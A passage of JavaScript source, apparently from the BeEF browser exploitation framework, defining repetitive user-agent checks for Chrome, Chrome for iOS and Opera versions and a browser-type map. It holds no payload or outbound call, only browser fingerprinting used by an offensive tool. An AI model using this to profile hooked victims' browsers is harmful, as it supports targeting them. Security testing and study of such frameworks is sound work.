3305 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 12) ? true : false);
3306 },
3307
3308 /**
3309 * Returns true if Chrome 13.
3310 * @example: beef.browser.isC13()
3311 */
3312 isC13: function () {
3313 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 13) ? true : false);
3314 },
3315
3316 /**
3317 * Returns true if Chrome 14.
3318 * @example: beef.browser.isC14()
3319 */
3320 isC14: function () {
3321 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 14) ? true : false);
3322 },
3323
3324 /**
3325 * Returns true if Chrome 15.
3326 * @example: beef.browser.isC15()
3327 */
3328 isC15: function () {
3329 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 15) ? true : false);
3330 },
3331
3332 /**
3333 * Returns true if Chrome 16.
3334 * @example: beef.browser.isC16()
3335 */
3336 isC16: function () {
3337 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 16) ? true : false);
3338 },
3339
3340 /**
3341 * Returns true if Chrome 17.
3342 * @example: beef.browser.isC17()
3343 */
3344 isC17: function () {
3345 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 17) ? true : false);
3346 },
3347
3348 /**
3349 * Returns true if Chrome 18.
3350 * @example: beef.browser.isC18()
3351 */
3352 isC18: function () {
3353 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 18) ? true : false);
3354 },
3355
3356 /**
3357 * Returns true if Chrome 19.
3358 * @example: beef.browser.isC19()
3359 */
3360 isC19: function () {
3361 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
3362 },
3363
3364 /**
3365 * Returns true if Chrome for iOS 19.
3366 * @example: beef.browser.isC19iOS()
3367 */
3368 isC19iOS: function () {
3369 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
3370 },
3371
3372 /**
3373 * Returns true if Chrome 20.
3374 * @example: beef.browser.isC20()
3375 */
3376 isC20: function () {
3377 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
3378 },
3379
3380 /**
3381 * Returns true if Chrome for iOS 20.
3382 * @example: beef.browser.isC20iOS()
3383 */
3384 isC20iOS: function () {
3385 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
3386 },
3387
3388 /**
3389 * Returns true if Chrome 21.
3390 * @example: beef.browser.isC21()
3391 */
3392 isC21: function () {
3393 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
3394 },
3395
3396 /**
3397 * Returns true if Chrome for iOS 21.
3398 * @example: beef.browser.isC21iOS()
3399 */
3400 isC21iOS: function () {
3401 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
3402 },
3403
3404 /**
3405 * Returns true if Chrome 22.
3406 * @example: beef.browser.isC22()
3407 */
3408 isC22: function () {
3409 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
3410 },
3411
3412 /**
3413 * Returns true if Chrome for iOS 22.
3414 * @example: beef.browser.isC22iOS()
3415 */
3416 isC22iOS: function () {
3417 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
3418 },
3419
3420 /**
3421 * Returns true if Chrome 23.
3422 * @example: beef.browser.isC23()
3423 */
3424 isC23: function () {
3425 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
3426 },
3427
3428 /**
3429 * Returns true if Chrome for iOS 23.
3430 * @example: beef.browser.isC23iOS()
3431 */
3432 isC23iOS: function () {
3433 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
3434 },
3435
3436 /**
3437 * Returns true if Chrome 24.
3438 * @example: beef.browser.isC24()
3439 */
3440 isC24: function () {
3441 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
3442 },
3443
3444 /**
3445 * Returns true if Chrome for iOS 24.
3446 * @example: beef.browser.isC24iOS()
3447 */
3448 isC24iOS: function () {
3449 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
3450 },
3451
3452 /**
3453 * Returns true if Chrome 25.
3454 * @example: beef.browser.isC25()
3455 */
3456 isC25: function () {
3457 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
3458 },
3459
3460 /**
3461 * Returns true if Chrome for iOS 25.
3462 * @example: beef.browser.isC25iOS()
3463 */
3464 isC25iOS: function () {
3465 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
3466 },
3467
3468 /**
3469 * Returns true if Chrome 26.
3470 * @example: beef.browser.isC26()
3471 */
3472 isC26: function () {
3473 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
3474 },
3475
3476 /**
3477 * Returns true if Chrome for iOS 26.
3478 * @example: beef.browser.isC26iOS()
3479 */
3480 isC26iOS: function () {
3481 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
3482 },
3483
3484 /**
3485 * Returns true if Chrome 27.
3486 * @example: beef.browser.isC27()
3487 */
3488 isC27: function () {
3489 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
3490 },
3491
3492 /**
3493 * Returns true if Chrome for iOS 27.
3494 * @example: beef.browser.isC27iOS()
3495 */
3496 isC27iOS: function () {
3497 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
3498 },
3499
3500 /**
3501 * Returns true if Chrome 28.
3502 * @example: beef.browser.isC28()
3503 */
3504 isC28: function () {
3505 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
3506 },
3507
3508 /**
3509 * Returns true if Chrome for iOS 28.
3510 * @example: beef.browser.isC28iOS()
3511 */
3512 isC28iOS: function () {
3513 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
3514 },
3515
3516 /**
3517 * Returns true if Chrome 29.
3518 * @example: beef.browser.isC29()
3519 */
3520 isC29: function () {
3521 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
3522 },
3523
3524 /**
3525 * Returns true if Chrome for iOS 29.
3526 * @example: beef.browser.isC29iOS()
3527 */
3528 isC29iOS: function () {
3529 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
3530 },
3531
3532 /**
3533 * Returns true if Chrome 30.
3534 * @example: beef.browser.isC30()
3535 */
3536 isC30: function () {
3537 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
3538 },
3539
3540 /**
3541 * Returns true if Chrome for iOS 30.
3542 * @example: beef.browser.isC30iOS()
3543 */
3544 isC30iOS: function () {
3545 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
3546 },
3547
3548 /**
3549 * Returns true if Chrome 31.
3550 * @example: beef.browser.isC31()
3551 */
3552 isC31: function () {
3553 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 31) ? true : false);
3554 },
3555
3556 /**
3557 * Returns true if Chrome for iOS 31.
3558 * @example: beef.browser.isC31iOS()
3559 */
3560 isC31iOS: function () {
3561 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
3562 },
3563
3564 /**
3565 * Returns true if Chrome 32.
3566 * @example: beef.browser.isC32()
3567 */
3568 isC32: function () {
3569 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 32) ? true : false);
3570 },
3571
3572 /**
3573 * Returns true if Chrome for iOS 32.
3574 * @example: beef.browser.isC32iOS()
3575 */
3576 isC32iOS: function () {
3577 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 32) ? true : false);
3578 },
3579
3580 /**
3581 * Returns true if Chrome 33.
3582 * @example: beef.browser.isC33()
3583 */
3584 isC33: function () {
3585 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 33) ? true : false);
3586 },
3587
3588 /**
3589 * Returns true if Chrome for iOS 33.
3590 * @example: beef.browser.isC33iOS()
3591 */
3592 isC33iOS: function () {
3593 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 33) ? true : false);
3594 },
3595
3596 /**
3597 * Returns true if Chrome 34.
3598 * @example: beef.browser.isC34()
3599 */
3600 isC34: function () {
3601 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 34) ? true : false);
3602 },
3603
3604 /**
3605 * Returns true if Chrome for iOS 34.
3606 * @example: beef.browser.isC34iOS()
3607 */
3608 isC34iOS: function () {
3609 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 34) ? true : false);
3610 },
3611
3612 /**
3613 * Returns true if Chrome 35.
3614 * @example: beef.browser.isC35()
3615 */
3616 isC35: function () {
3617 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 35) ? true : false);
3618 },
3619
3620 /**
3621 * Returns true if Chrome for iOS 35.
3622 * @example: beef.browser.isC35iOS()
3623 */
3624 isC35iOS: function () {
3625 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 35) ? true : false);
3626 },
3627
3628 /**
3629 * Returns true if Chrome 36.
3630 * @example: beef.browser.isC36()
3631 */
3632 isC36: function () {
3633 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 36) ? true : false);
3634 },
3635
3636 /**
3637 * Returns true if Chrome for iOS 36.
3638 * @example: beef.browser.isC36iOS()
3639 */
3640 isC36iOS: function () {
3641 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 36) ? true : false);
3642 },
3643
3644 /**
3645 * Returns true if Chrome 37.
3646 * @example: beef.browser.isC37()
3647 */
3648 isC37: function () {
3649 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 37) ? true : false);
3650 },
3651
3652 /**
3653 * Returns true if Chrome for iOS 37.
3654 * @example: beef.browser.isC37iOS()
3655 */
3656 isC37iOS: function () {
3657 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 37) ? true : false);
3658 },
3659
3660 /**
3661 * Returns true if Chrome 38.
3662 * @example: beef.browser.isC38()
3663 */
3664 isC38: function () {
3665 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 38) ? true : false);
3666 },
3667
3668 /**
3669 * Returns true if Chrome for iOS 38.
3670 * @example: beef.browser.isC38iOS()
3671 */
3672 isC38iOS: function () {
3673 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 38) ? true : false);
3674 },
3675
3676 /**
3677 * Returns true if Chrome 39.
3678 * @example: beef.browser.isC39()
3679 */
3680 isC39: function () {
3681 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 39) ? true : false);
3682 },
3683
3684 /**
3685 * Returns true if Chrome for iOS 39.
3686 * @example: beef.browser.isC39iOS()
3687 */
3688 isC39iOS: function () {
3689 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 39) ? true : false);
3690 },
3691
3692 /**
3693 * Returns true if Chrome 40.
3694 * @example: beef.browser.isC40()
3695 */
3696 isC40: function () {
3697 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 40) ? true : false);
3698 },
3699
3700 /**
3701 * Returns true if Chrome for iOS 40.
3702 * @example: beef.browser.isC40iOS()
3703 */
3704 isC40iOS: function () {
3705 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 40) ? true : false);
3706 },
3707
3708 /**
3709 * Returns true if Chrome 41.
3710 * @example: beef.browser.isC41()
3711 */
3712 isC41: function () {
3713 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 41) ? true : false);
3714 },
3715
3716 /**
3717 * Returns true if Chrome for iOS 41.
3718 * @example: beef.browser.isC41iOS()
3719 */
3720 isC41iOS: function () {
3721 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 41) ? true : false);
3722 },
3723
3724 /**
3725 * Returns true if Chrome 42.
3726 * @example: beef.browser.isC42()
3727 */
3728 isC42: function () {
3729 return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 42) ? true : false);
3730 },
3731
3732 /**
3733 * Returns true if Chrome for iOS 42.
3734 * @example: beef.browser.isC42iOS()
3735 */
3736 isC42iOS: function () {
3737 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 42) ? true : false);
3738 },
3739
3740 /**
3741 * Returns true if Chrome 43.
3742 * @example: beef.browser.isC43()
3743 */
3744 isC43: function () {
3745 return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 43) ? true : false);
3746 },
3747
3748 /**
3749 * Returns true if Chrome for iOS 43.
3750 * @example: beef.browser.isC43iOS()
3751 */
3752 isC43iOS: function () {
3753 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 43) ? true : false);
3754 },
3755
3756 /**
3757 * Returns true if Chrome 44.
3758 * @example: beef.browser.isC44()
3759 */
3760 isC44: function () {
3761 return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 44) ? true : false);
3762 },
3763
3764 /**
3765 * Returns true if Chrome for iOS 44.
3766 * @example: beef.browser.isC44iOS()
3767 */
3768 isC44iOS: function () {
3769 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 44) ? true : false);
3770 },
3771
3772 /**
3773 * Returns true if Chrome 45.
3774 * @example: beef.browser.isC45()
3775 */
3776 isC45: function () {
3777 return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 45) ? true : false);
3778 },
3779
3780 /**
3781 * Returns true if Chrome 46.
3782 * @example: beef.browser.isC46()
3783 */
3784 isC46: function () {
3785 return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 46) ? true : false);
3786 },
3787
3788 isC47: function () {
3789 return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 47) ? true : false);
3790 },
3791
3792 /**
3793 * Returns true if Chrome for iOS 45.
3794 * @example: beef.browser.isC45iOS()
3795 */
3796 isC45iOS: function () {
3797 return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 45) ? true : false);
3798 },
3799
3800 /**
3801 * Returns true if Chrome.
3802 * @example: beef.browser.isC()
3803 */
3804 isC: function () {
3805 return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC46() || this.isC47()|| this.isC45iOS();
3806 },
3807
3808 /**
3809 * Returns true if Opera 9.50 through 9.52.
3810 * @example: beef.browser.isO9_52()
3811 */
3812 isO9_52: function () {
3813 return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null));
3814 },
3815
3816 /**
3817 * Returns true if Opera 9.60 through 9.64.
3818 * @example: beef.browser.isO9_60()
3819 */
3820 isO9_60: function () {
3821 return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null));
3822 },
3823
3824 /**
3825 * Returns true if Opera 10.xx.
3826 * @example: beef.browser.isO10()
3827 */
3828 isO10: function () {
3829 return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null));
3830 },
3831
3832 /**
3833 * Returns true if Opera 11.xx.
3834 * @example: beef.browser.isO11()
3835 */
3836 isO11: function () {
3837 return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
3838 },
3839
3840 /**
3841 * Returns true if Opera 12.xx.
3842 * @example: beef.browser.isO12()
3843 */
3844 isO12: function () {
3845 return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
3846 },
3847
3848 /**
3849 * Returns true if Opera.
3850 * @example: beef.browser.isO()
3851 */
3852 isO: function () {
3853 return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
3854 },
3855
3856 /**
3857 * Returns a hash of string keys representing a given capability
3858 * @example: beef.browser.capabilities()["navigator.plugins"]
3859 */
3860 capabilities: function () {
3861 var out = {};
3862 var type = this.type();
3863
3864 out["navigator.plugins"] = (type.IE11 || !type.IE);
3865
3866 return out;
3867 },
3868
3869 /**
3870 * Returns the type of browser being used.
3871 * @example: beef.browser.type().IE6
3872 * @example: beef.browser.type().FF
3873 * @example: beef.browser.type().O
3874 */
3875 type: function () {
3876
3877 return {
3878 C5: this.isC5(), // Chrome 5
3879 C6: this.isC6(), // Chrome 6
3880 C7: this.isC7(), // Chrome 7
3881 C8: this.isC8(), // Chrome 8
3882 C9: this.isC9(), // Chrome 9
3883 C10: this.isC10(), // Chrome 10
3884 C11: this.isC11(), // Chrome 11
3885 C12: this.isC12(), // Chrome 12
3886 C13: this.isC13(), // Chrome 13
3887 C14: this.isC14(), // Chrome 14
3888 C15: this.isC15(), // Chrome 15
3889 C16: this.isC16(), // Chrome 16
3890 C17: this.isC17(), // Chrome 17
3891 C18: this.isC18(), // Chrome 18
3892 C19: this.isC19(), // Chrome 19
3893 C19iOS: this.isC19iOS(), // Chrome 19 on iOS
3894 C20: this.isC20(), // Chrome 20
3895 C20iOS: this.isC20iOS(), // Chrome 20 on iOS
3896 C21: this.isC21(), // Chrome 21
3897 C21iOS: this.isC21iOS(), // Chrome 21 on iOS
3898 C22: this.isC22(), // Chrome 22
3899 C22iOS: this.isC22iOS(), // Chrome 22 on iOS
3900 C23: this.isC23(), // Chrome 23
3901 C23iOS: this.isC23iOS(), // Chrome 23 on iOS
3902 C24: this.isC24(), // Chrome 24
3903 C24iOS: this.isC24iOS(), // Chrome 24 on iOS
3904 C25: this.isC25(), // Chrome 25
3905 C25iOS: this.isC25iOS(), // Chrome 25 on iOS
3906 C26: this.isC26(), // Chrome 26
3907 C26iOS: this.isC26iOS(), // Chrome 26 on iOS
3908 C27: this.isC27(), // Chrome 27
3909 C27iOS: this.isC27iOS(), // Chrome 27 on iOS
3910 C28: this.isC28(), // Chrome 28
3911 C28iOS: this.isC28iOS(), // Chrome 28 on iOS
3912 C29: this.isC29(), // Chrome 29
3913 C29iOS: this.isC29iOS(), // Chrome 29 on iOS
3914 C30: this.isC30(), // Chrome 30
3915 C30iOS: this.isC30iOS(), // Chrome 30 on iOS
3916 C31: this.isC31(), // Chrome 31
3917 C31iOS: this.isC31iOS(), // Chrome 31 on iOS
3918 C32: this.isC32(), // Chrome 32
3919 C32iOS: this.isC32iOS(), // Chrome 32 on iOS
3920 C33: this.isC33(), // Chrome 33
3921 C33iOS: this.isC33iOS(), // Chrome 33 on iOS
3922 C34: this.isC34(), // Chrome 34
3923 C34iOS: this.isC34iOS(), // Chrome 34 on iOS
3924 C35: this.isC35(), // Chrome 35
3925 C35iOS: this.isC35iOS(), // Chrome 35 on iOS
3926 C36: this.isC36(), // Chrome 36
3927 C36iOS: this.isC36iOS(), // Chrome 36 on iOS
3928 C37: this.isC37(), // Chrome 37
3929 C37iOS: this.isC37iOS(), // Chrome 37 on iOS
3930 C38: this.isC38(), // Chrome 38
3931 C38iOS: this.isC38iOS(), // Chrome 38 on iOS
3932 C39: this.isC39(), // Chrome 39
3933 C39iOS: this.isC39iOS(), // Chrome 39 on iOS
3934 C40: this.isC40(), // Chrome 40
3935 C40iOS: this.isC40iOS(), // Chrome 40 on iOS
3936 C41: this.isC41(), // Chrome 41
3937 C41iOS: this.isC41iOS(), // Chrome 41 on iOS
3938 C42: this.isC42(), // Chrome 42
3939 C42iOS: this.isC42iOS(), // Chrome 42 on iOS
3940 C43: this.isC43(), // Chrome 43
3941 C43iOS: this.isC43iOS(), // Chrome 43 on iOS
3942 C44: this.isC44(), // Chrome 44
3943 C44iOS: this.isC44iOS(), // Chrome 44 on iOS
3944 C45: this.isC45(), // Chrome 45
3945 C46: this.isC46(), // Chrome 46
3946 C47: this.isC47(), // Chrome 46
3947 C45iOS: this.isC45iOS(), // Chrome 45 on iOS
3948
3949 C: this.isC(), // Chrome any version
3950
3951 FF2: this.isFF2(), // Firefox 2
3952 FF3: this.isFF3(), // Firefox 3
3953 FF3_5: this.isFF3_5(), // Firefox 3.5
3954 FF3_6: this.isFF3_6(), // Firefox 3.6
3955 FF4: this.isFF4(), // Firefox 4
3956 FF5: this.isFF5(), // Firefox 5
3957 FF6: this.isFF6(), // Firefox 6
3958 FF7: this.isFF7(), // Firefox 7
3959 FF8: this.isFF8(), // Firefox 8
3960 FF9: this.isFF9(), // Firefox 9
3961 FF10: this.isFF10(), // Firefox 10
3962 FF11: this.isFF11(), // Firefox 11
3963 FF12: this.isFF12(), // Firefox 12
3964 FF13: this.isFF13(), // Firefox 13
3965 FF14: this.isFF14(), // Firefox 14
3966 FF15: this.isFF15(), // Firefox 15
3967 FF16: this.isFF16(), // Firefox 16
3968 FF17: this.isFF17(), // Firefox 17
3969 FF18: this.isFF18(), // Firefox 18
3970 FF19: this.isFF19(), // Firefox 19
3971 FF20: this.isFF20(), // Firefox 20
3972 FF21: this.isFF21(), // Firefox 21
3973 FF22: this.isFF22(), // Firefox 22
3974 FF23: this.isFF23(), // Firefox 23
3975 FF24: this.isFF24(), // Firefox 24
3976 FF25: this.isFF25(), // Firefox 25
3977 FF26: this.isFF26(), // Firefox 26
3978 FF27: this.isFF27(), // Firefox 27
3979 FF28: this.isFF28(), // Firefox 28
3980 FF29: this.isFF29(), // Firefox 29
3981 FF30: this.isFF30(), // Firefox 30
3982 FF31: this.isFF31(), // Firefox 31
3983 FF32: this.isFF32(), // Firefox 32
3984 FF33: this.isFF33(), // Firefox 33
3985 FF34: this.isFF34(), // Firefox 34
3986 FF35: this.isFF35(), // Firefox 35
3987 FF36: this.isFF36(), // Firefox 36
